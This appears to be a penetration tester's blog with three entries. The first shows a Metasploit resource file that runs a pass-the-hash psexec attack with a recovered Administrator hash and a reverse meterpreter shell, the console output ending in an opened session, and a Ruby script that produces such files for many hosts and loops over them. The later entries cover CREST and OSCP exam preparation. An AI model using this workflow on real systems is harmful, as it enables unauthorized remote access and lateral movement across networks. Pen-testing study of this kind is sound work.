Entries in penetration testing (3)

Monday, Mar 21 2011

Metasploit resource files

Metasploit has a handy feature that allows you to load settings from a file, which lets us create easily repeatable configurations. When pen testing I like to create a directory structure, keeping notes and tool output in plain text files, and I find it useful to create and store the Metasploit resource files alongside these.

The directory structure looks something like the path used in the commands below: one directory per engagement (/root/2011-03-21_acme), then per network and host (192.168/1/230), with the resource file for that host (230_psexec.rc) stored inside it.

Within the 230_psexec.rc file I enter the commands I would issue in Metasploit to recreate the exploit used against a specific host, in this case reuse of the Administrator password across various targets. Note that SMBPass here is not a cleartext password but the LM:NTLM hash pair recovered from another host, so psexec is authenticating by pass-the-hash; any host that shares that hash falls to the same resource file. The LM half (aad3b435b51404eeaad3b435b51404ee) is the well-known hash of an empty LM password, so only the NT half is meaningful. Because the file now holds a working credential, treat the engagement directory accordingly. LHOST is set with setg rather than set so it lands in the global datastore and survives switching modules within the same session.

The contents of 230_psexec.rc looks like this:

use windows/smb/psexec
set PAYLOAD windows/meterpreter/reverse_tcp
setg LHOST 192.168.1.182
set RHOST 192.168.1.230
set SMBPass aad3b435b51404eeaad3b435b51404ee:49e02f1338d4b2bf743beeb97aee524d
set SMBUser Administrator
exploit


We can either start msfconsole and run these commands right away with:

msfconsole -r /root/2011-03-21_acme/192.168/1/230/230_psexec.rc

or use the ‘resource’ command from within msfconsole like this:

msf> resource /root/2011-03-21_acme/192.168/1/230/230_psexec.rc


Our output would look like this:

root@bt:~# msfconsole -r /root/2011-03-21_acme/192.168/1/230/230_psexec.rc

                __.                       .__.        .__. __.
  _____   _____/  |______    ____________ |  |   ____ |__|/  |_
 /     \_/ __ \   __\__  \  /  ___/\____ \|  |  /  _ \|  \   __\
|  Y Y  \  ___/|  |  / __ \_\___ \ |  |_> >  |_(  <_> )  ||  |
|__|_|  /\___  >__| (____  /____  >|   __/|____/\____/|__||__|
      \/     \/          \/     \/ |__|


       =[ metasploit v3.7.0-dev [core:3.7 api:1.0]
+ -- --=[ 653 exploits - 343 auxiliary
+ -- --=[ 216 payloads - 27 encoders - 8 nops
       =[ svn r11970 updated 5 days ago (2011.03.15)

resource (/root/2011-03-21_acme/192.168/1/230/230_psexec.rc)> use windows/smb/psexec
resource (/root/2011-03-21_acme/192.168/1/230/230_psexec.rc)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (/root/2011-03-21_acme/192.168/1/230/230_psexec.rc)> setg LHOST 192.168.1.182
LHOST => 192.168.1.182
resource (/root/2011-03-21_acme/192.168/1/230/230_psexec.rc)> set RHOST 192.168.1.230
RHOST => 192.168.1.230
resource (/root/2011-03-21_acme/192.168/1/230/230_psexec.rc)> set SMBPass aad3b435b51404eeaad3b435b51404ee:49e02f1338d4b2bf743beeb97aee524d
SMBPass => aad3b435b51404eeaad3b435b51404ee:49e02f1338d4b2bf743beeb97aee524d
resource (/root/2011-03-21_acme/192.168/1/230/230_psexec.rc)> set SMBUser Administrator
SMBUser => Administrator
resource (/root/2011-03-21_acme/192.168/1/230/230_psexec.rc)> exploit
[*] Started reverse handler on 192.168.1.182:4444
[*] Connecting to the server...
[*] Authenticating to 192.168.1.230:445|WORKGROUP as user 'Administrator'...
[*] Uploading payload...
[*] Created \TwLkuthH.exe...
[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.230[\svcctl] ...
[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.230[\svcctl] ...
[*] Obtaining a service manager handle...
[*] Creating a new service (dcZDWuwa - "MluCkfMYLQRNHpqECJiJY")...
[*] Closing service handle...
[*] Opening service...
[*] Starting the service...
[*] Removing the service...
[*] Sending stage (749056 bytes) to 192.168.1.230
[*] Closing service handle...
[*] Deleting \TwLkuthH.exe...
[*] Meterpreter session 1 opened (192.168.1.182:4444 -> 192.168.1.230:49305) at Sun Mar 20 23:45:20 +0000 2011

meterpreter >

You can also now add Ruby scripts into the .rc files. I am yet to play around with these but can imagine some very useful scripts; I will write more once I have tried them out.
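As an added example, not code from the original post, the Ruby script below generates the per-target resource files described above for a list of hosts that share the same Administrator hash, and also shows the embedded <ruby> block form that lets a single .rc file loop over targets. The directory convention (engagement root, then a.b/c/d/d_psexec.rc) is taken from the paths in the post; the host list, engagement root and helper names (rc_path, psexec_rc, psexec_rc_multi, write_rc_tree) are my own constructed sample data and assumptions. run_single is the console hook msfconsole exposes inside <ruby> blocks; the generated resource file is written out, not executed, by this script.

```ruby
# Added example (not from the original post): generate the per-target
# Metasploit resource files from one engagement host list so the same
# pass-the-hash psexec run can be replayed against every host that
# shares the Administrator hash.
#
# Assumptions: root directory, hosts and hash below are constructed sample
# data; the <root>/<a.b>/<c>/<d>/<d>_psexec.rc layout follows the post.
require 'fileutils'
require 'tmpdir'

HEX32 = /\A\h{32}\z/

# SMBPass accepts a cleartext password or an LM:NTLM pair. Insist on a
# well-formed pair so a typo does not become a failed-logon burst.
def validate_hash_pair(pair)
  lm, nt = pair.split(':', 2)
  raise ArgumentError, 'SMBPass must be LM:NTLM (32 hex : 32 hex)' unless lm && nt && lm =~ HEX32 && nt =~ HEX32
  pair.downcase
end

# True when the LM half is the hash of an empty LM password, i.e. LM
# storage was disabled on the source host and only the NT hash matters.
def empty_lm?(pair)
  pair.downcase.start_with?('aad3b435b51404eeaad3b435b51404ee:')
end

# Path convention from the post: <root>/<a.b>/<c>/<d>/<d>_psexec.rc
def rc_path(root, rhost)
  a, b, c, d = rhost.split('.')
  raise ArgumentError, "bad IPv4 address: #{rhost}" unless d && [a, b, c, d].all? { |o| o =~ /\A\d{1,3}\z/ }
  File.join(root, "#{a}.#{b}", c, d, "#{d}_psexec.rc")
end

# One resource file per target, same commands as the post's 230_psexec.rc.
def psexec_rc(lhost:, rhost:, user:, hash_pair:)
  pair = validate_hash_pair(hash_pair)
  <<~RC
    use exploit/windows/smb/psexec
    set PAYLOAD windows/meterpreter/reverse_tcp
    setg LHOST #{lhost}
    set RHOST #{rhost}
    set SMBUser #{user}
    set SMBPass #{pair}
    exploit
  RC
end

# Single-file alternative: the loop lives in an embedded <ruby> block that
# msfconsole evaluates with the console as self. run_single issues one
# console command; -j -z backgrounds each session so the loop continues.
def psexec_rc_multi(lhost:, hosts:, user:, hash_pair:)
  pair = validate_hash_pair(hash_pair)
  <<~RC
    use exploit/windows/smb/psexec
    set PAYLOAD windows/meterpreter/reverse_tcp
    setg LHOST #{lhost}
    set SMBUser #{user}
    set SMBPass #{pair}
    <ruby>
    #{hosts.inspect}.each do |h|
      run_single("set RHOST \#{h}")
      run_single("exploit -j -z")
    end
    </ruby>
  RC
end

# Create the per-host tree and return the paths written.
def write_rc_tree(root, lhost:, hosts:, user:, hash_pair:)
  hosts.map do |h|
    path = rc_path(root, h)
    FileUtils.mkdir_p(File.dirname(path))
    File.write(path, psexec_rc(lhost: lhost, rhost: h, user: user, hash_pair: hash_pair))
    path
  end
end

if __FILE__ == $PROGRAM_NAME
  # Constructed sample data, not from a real engagement.
  root  = ARGV[0] || File.join(Dir.tmpdir, '2011-03-21_acme')
  hash  = 'aad3b435b51404eeaad3b435b51404ee:49e02f1338d4b2bf743beeb97aee524d'
  hosts = %w[192.168.1.230 192.168.1.231 192.168.2.15]
  write_rc_tree(root, lhost: '192.168.1.182', hosts: hosts, user: 'Administrator', hash_pair: hash).each { |p| puts p }
  warn 'note: LM half is the empty-LM hash; only the NT hash is meaningful' if empty_lm?(hash)
end
```

Run it with the engagement root as the first argument and then load any one of the generated files with msfconsole -r, exactly as in the post; the multi-target variant is only worth the embedded Ruby once you have more hosts than you want to type resource files for by hand.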
Thursday, Nov 11 2010

CREST Registered Tester

Since my last update I have not been sitting around idle: I have been offered a new position on a penetration testing team which starts in January, and I have set my sights on doing the CREST Registered Tester exam early in 2011. More information, including the CREST Technical Syllabus, can be found at crest-approved.org.

The CREST exams look interesting, with a mix of practical assessment, multiple choice and long-form written exam questions. The syllabus looks to be well rounded, covering a range of topics from both infrastructure and application testing. The NBISE have posted some material with suggestions on how to prepare for the exam here.

Interestingly the NBISE (National Board of Information Security Examiners) in the US have teamed up with CREST and are piloting the exams in the US. Paul Roberts wrote an article over at Threatpost, “New Certification Will Set High Bar for IT Security Pros”, which is worth a read.

Personally I think a lot more value is gained from a certification that actually tests your hands on skills rather than your ability to retain enough information long enough to pass a written exam.

Wednesday, Aug 04 2010

Recommended Preparation - PWB - OSCP

When I was doing research prior to starting the PWB v3 course I spent some time trying to find out what I should know before the course started. This is just me: I try to prepare for everything I do in advance, read articles and reviews, buy books and learn as much as I can. I was very pleased to find the course is really well taught and I have not had a problem with any of it so far, although it has certainly been a challenge.

Firstly, the course does not assume too much, and you can learn everything you need to know as you go along. If you are like me, though, you will be itching to get started and learn something.

Course syllabus: have a look at the course syllabus and make sure you are at least familiar with the concepts of the material you are going to be learning about. Google is your friend here; I would recommend learning a little about the tools you will be using. The syllabus and objectives can be found here.

Linux: unless you are familiar with Linux and the command line I would recommend doing some preparation. This is not mandatory, as you will learn during the course, but it will save you time in the long run; linuxcommand.org will help get you up to speed.

Get familiar with BackTrack Linux. It sounds like a no-brainer, but there are a whole lot of tools included with this operating system, many of which you will be using during the course, so knowing your way around the OS will help.

Programming: this is the part that had me worried. I have very little programming experience and thought that I would be really held back by this, but during the course I have written small programs in Python and Perl and edited exploits in Ruby and C. Understanding how a program works will help, but knowing how to program is not essential. If you are planning to learn programming in Python, check out “Think Python: How to Think Like a Computer Scientist” by Allen B. Downey.

If it will be a while before you start the Pentesting with BackTrack course you may want to check out the free Metasploit Unleashed course from Offensive Security. If you can, please also consider donating some money to Hackers for Charity; there is more information on the front page of the course.


That’s all for today, hope you found this helpful. If you have some good resources to add please comment below.